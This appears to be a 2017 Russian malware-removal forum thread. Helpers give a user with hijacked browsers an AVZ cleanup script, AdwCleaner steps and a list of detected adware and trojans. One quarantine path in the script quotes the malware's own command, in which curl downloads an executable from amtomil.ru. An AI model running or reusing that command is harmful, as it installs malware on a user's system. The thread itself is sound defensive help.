Некорректная работа браузеров [not-a-virus:AdWare.Win32.Agent.xxdjcz, UDS:DangerousObject.Multi.Generic ]

**lionpro** · 11.09.2017, 09:09

На компьютер было скачано и запущено непроверенное приложение.
После этого браузеры перестали работать нормально:
- поисковая служба сменилась на Mail.ru
- при открытии новой вкладки запускается стартовая страница Mail.ru
- домашняя страница сменилась на Mail.ru
- Хром при открытии не открывает вкладки открытые в предыдущей сессии. Хотя эта настройка ставится, через некоторе время она меняется на "Начать с домашней страницы"
- Мозила (браузер по умолчанию) периодически сам открывает страницы типа этих

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 11.09.2017, 09:12

Уважаемый(ая) lionpro, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**lionpro** · 13.09.2017, 07:44

На компьютер было скачано и запущено непроверенное приложение.
После этого браузеры перестали работать нормально:
- поисковая служба сменилась на Mail.ru
- при открытии новой вкладки запускается стартовая страница Mail.ru
- домашняя страница сменилась на Mail.ru
- Хром при открытии не открывает вкладки открытые в предыдущей сессии. Хотя эта настройка ставится, через некоторе время она меняется на "Начать с домашней страницы"
- Мозила (браузер по умолчанию) периодически сам открывает нежелательные страницы с рекламой

**Vvvyg** · 14.09.2017, 23:21

Удалите программы SIVApp и YoutubeAdBlock.

Удалите в браузерах все расширения от Mail.Ru? а также Блокировщик Рекламы Для Ютуба™.

Выполните скрипт в AVZ:

Код:

begin
 TerminateProcessByName('c:\program files\c6365617902d5552bbdb08f17cc26c7e\76044d642946df609f05fb6f87d36959.exe');
 TerminateProcessByName('C:\Windows\System32\icacl.exe');
 TerminateProcessByName('c:\users\nara-2\appdata\local\mail.ru\mrkeeper.exe');
 TerminateProcessByName('c:\program files (x86)\qyerbvxrhie\otrtnnxnaz.exe');
 StopService('c6365617902d5552bbdb08f17cc26c7e');
 StopService('icacl');
 StopService('eb10d923b9aeff4bd5cd083bec2cadfb');
 QuarantineFile('c:\program files\c6365617902d5552bbdb08f17cc26c7e\76044d642946df609f05fb6f87d36959.exe', '');
 QuarantineFile('C:\Windows\System32\icacl.exe', '');
 QuarantineFile('c:\users\nara-2\appdata\local\mail.ru\mrkeeper.exe', '');
 QuarantineFile('c:\program files (x86)\qyerbvxrhie\otrtnnxnaz.exe', '');
 QuarantineFile('C:\Users\Nara-2\AppData\LocalLow\SearchGo\searchgo.dll', '');
 QuarantineFile('C:\Program Files (x86)\QYERbvxRHIE\kHRPnS1m.dll', '');
 QuarantineFile('C:\Program Files (x86)\QYERbvxRHIE\f2HOY1b.dll', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Local\Temp\nsj8825.tmp\System.dll', '');
 QuarantineFile('C:\Windows\system32\drivers\eb10d923b9aeff4bd5cd083bec2cadfb.sys', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Roaming\SIVApp\SIVApp.exe', '');
 QuarantineFile('C:\Program Files\KNP Plugin\bin\knpPluginLogonTask.bat', '');
 QuarantineFile('C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll', '');
 QuarantineFile('C:\Windows\27446c4dab8c80606a280e7753e862ff.ps1', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Roaming\curl\curl_7_54.exe  -f -L http://amtomil.ru/f.exe -o C:\Users\Nara-2\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Roaming\curl\curl_7_54.exe', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Program Files (x86)\DllKitPRO\dllkitpro.exe', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Local\SearchGo\searchgo.exe', '');
 QuarantineFile('C:\Program Files (x86)\GXZiGyYLSHyU2\j23eY1B.dll', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Local\wmipr\wmipr.exe', '');
 QuarantineFile('C:\Users\Nara-2\AppData\Local\wupdate\wupdate.exe', '');
 DeleteFile('C:\Windows\Tasks\uuxHwpnMkRCRpJh.job', '64');
 DeleteFile('c:\program files\c6365617902d5552bbdb08f17cc26c7e\76044d642946df609f05fb6f87d36959.exe', '32');
 DeleteFile('C:\Windows\System32\icacl.exe', '32');
 DeleteFile('C:\Users\Nara-2\Favorites\Links\Интернет.url', '32');
 DeleteFile('C:\Users\Nara-2\Desktop\Поиcк в Интeрнете.lnk', '32');
 DeleteFile('C:\Users\Nara-2\Desktop\Вoйти в Интeрнет.lnk', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Вoйти в Интeрнeт.lnk', '32');
 DeleteFile('c:\users\nara-2\appdata\local\mail.ru\mrkeeper.exe', '32');
 DeleteFile('c:\program files (x86)\qyerbvxrhie\otrtnnxnaz.exe', '32');
 DeleteFile('C:\Users\Nara-2\AppData\LocalLow\SearchGo\searchgo.dll', '32');
 DeleteFile('C:\Program Files (x86)\QYERbvxRHIE\kHRPnS1m.dll', '32');
 DeleteFile('C:\Program Files (x86)\QYERbvxRHIE\f2HOY1b.dll', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Local\Temp\nsj8825.tmp\System.dll', '32');
 DeleteFile('C:\Windows\system32\drivers\eb10d923b9aeff4bd5cd083bec2cadfb.sys', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Roaming\SIVApp\SIVApp.exe', '32');
 DeleteFile('C:\Program Files\KNP Plugin\bin\knpPluginLogonTask.bat', '32');
 DeleteFile('C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll', '32');
 DeleteFile('C:\Windows\27446c4dab8c80606a280e7753e862ff.ps1', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Roaming\curl\curl_7_54.exe', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Program Files (x86)\DllKitPRO\dllkitpro.exe', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Roaming\Microsoft\msi.exe', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Local\SearchGo\searchgo.exe', '32');
 DeleteFile('C:\Program Files (x86)\GXZiGyYLSHyU2\j23eY1B.dll', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Local\wmipr\wmipr.exe', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Local\wupdate\wupdate.exe', '32');
 DeleteFile('C:\Users\Nara-2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk');
 DeleteService('c6365617902d5552bbdb08f17cc26c7e');
 DeleteService('icacl');
 DeleteService('eb10d923b9aeff4bd5cd083bec2cadfb');
 DeleteFileMask('c:\program files\c6365617902d5552bbdb08f17cc26c7e', '*', true);
 DeleteFileMask('c:\users\nara-2\appdata\local\mail.ru', '*', true);
 DeleteFileMask('c:\program files (x86)\qyerbvxrhie', '*', true);
 DeleteFileMask('c:\users\nara-2\appdata\locallow\searchgo', '*', true);
 DeleteFileMask('c:\users\nara-2\appdata\roaming\sivapp', '*', true);
 DeleteFileMask('c:\program files (x86)\thzxujvju', '*', true);
 DeleteFileMask('c:\users\nara-2\appdata\roaming\curl', '*', true);
 DeleteFileMask('c:\program files (x86)\dllkitpro', '*', true);
 DeleteFileMask('c:\users\nara-2\appdata\local\searchgo', '*', true);
 DeleteFileMask('c:\program files (x86)\gxzigyylshyu2', '*', true);
 DeleteFileMask('c:\users\nara-2\appdata\local\wmipr', '*', true);
 DeleteFileMask('c:\users\nara-2\appdata\local\wupdate', '*', true);
 DeleteDirectory('c:\program files\c6365617902d5552bbdb08f17cc26c7e');
 DeleteDirectory('c:\users\nara-2\appdata\local\mail.ru');
 DeleteDirectory('c:\program files (x86)\qyerbvxrhie');
 DeleteDirectory('c:\users\nara-2\appdata\locallow\searchgo');
 DeleteDirectory('c:\users\nara-2\appdata\roaming\sivapp');
 DeleteDirectory('c:\program files (x86)\thzxujvju');
 DeleteDirectory('c:\users\nara-2\appdata\roaming\curl');
 DeleteDirectory('c:\program files (x86)\dllkitpro');
 DeleteDirectory('c:\users\nara-2\appdata\local\searchgo');
 DeleteDirectory('c:\program files (x86)\gxzigyylshyu2');
 DeleteDirectory('c:\users\nara-2\appdata\local\wmipr');
 DeleteDirectory('c:\users\nara-2\appdata\local\wupdate');
 DelBHO('{598AEFC6-DD3C-4A63-9AC3-53FCF6155931}');
 DelBHO('{C0D38E5A-7CF8-4105-8FE8-31B81443A114}');
 DelBHO('{2BC46CFA-4B00-4193-A7BD-6AD1D0BCB5BC}');
 ExecuteFile('schtasks.exe', '/delete /TN "27446c4dab8c80606a280e7753e862ff" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "DllKitPRO" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "c6365617902d5552bbdb08f17cc26c7e" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "SearchGo Task" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "TnqpiRJoXWMCwN" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "uuxHwpnMkRCRpJh" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "uuxHwpnMkRCRpJh2" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "wmipr" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "wupdate" /F', 0, 15000, true);
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'SIVApp');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'kgfhfhxiii');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'KNPPlugin');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteRepair(3);
 ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".

Код:

>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk"    -> ["C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"  =>> --disable-quic]
>>>  "C:\Users\Nara-2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"    -> ["C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"  =>> --disable-quic]

Отчёт о работе прикрепите.

Сделайте новый лог Autologger.

Сделайте лог Malwarebytes AdwCleaner.

**lionpro** · 15.09.2017, 11:47

логи
при загрузке Винды, появляется сообщение о какой-то ошибке с каким-то файлом dll, со ссылкой на недавно удаленную программу DLL suite (кажется). Вобщем название начинается с DLL

**Vvvyg** · 15.09.2017, 20:00

# AdwCleaner v5.032 - Отчёт создан 04/02/2016 в 11:44:54
# Обновлено 31/01/2016 by Xplode
# База данных : 2016-02-02.1 [Сервер]

Свежий лог найдите и прикрепите.

**lionpro** · 18.09.2017, 07:24

Сорри, не посмотрел дату у предыдущего

**Vvvyg** · 18.09.2017, 22:08

Удалите всё найденное в AdwCleaner, дождитесь окончания удаления и перезагрузите систему по требованию программы.
После входа в систему откроется отчёт AdwCleaner - файл AdwCleaner[C0].txt, прикрепите к своему следующему сообщению.
Очистите кэш и cookies-файлы браузеров и сообщите, что с проблемами.

Если остались - сделайте такой лог.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше все в одном архиве).

**lionpro** · 19.09.2017, 09:20

за последние 3 часа работы ничего из указанных симптомов замечено не было
Надеюсь и не будет.
Спасибо)

**Vvvyg** · 19.09.2017, 22:15

Запустите AdwCleaner и нажмите Файл (File) -> Удалить (Uninstall).

Выполните рекомендации после лечения.

**CyberHelper** · 19.09.2017, 22:25

Статистика проведенного лечения:

Получено карантинов: 1
Обработано файлов: 13
В ходе лечения обнаружены вредоносные программы:
1. c:\users\nara-2\appdata\locallow\searchgo\searchgo.dll - not-a-virus:AdWare.Win32.Agent.xxdjcz
2. c:\users\nara-2\appdata\local\searchgo\searchgo.exe - Trojan.Win32.Reconyc.ifbk
3. c:\users\nara-2\appdata\local\wmipr\wmipr.exe - HEUR:Trojan.Win32.Generic
4. c:\users\nara-2\appdata\local\wupdate\wupdate.exe - Trojan.Win32.Agent.ikps
5. c:\users\nara-2\appdata\roaming\curl\curl_7_54.exe - UDS:DangerousObject.Multi.Generic
6. c:\users\nara-2\appdata\roaming\microsoft\msi.exe - not-a-virus:AdWare.Win32.AdLoad.abugt
7. c:\windows\system32\icacl.exe - not-a-virus:AdWare.Win64.Agent.mik

Некорректная работа браузеров [not-a-virus:AdWare.Win32.Agent.xxdjcz, UDS:DangerousObject.Multi.Generic ] (заявка № 215176)

Опции темы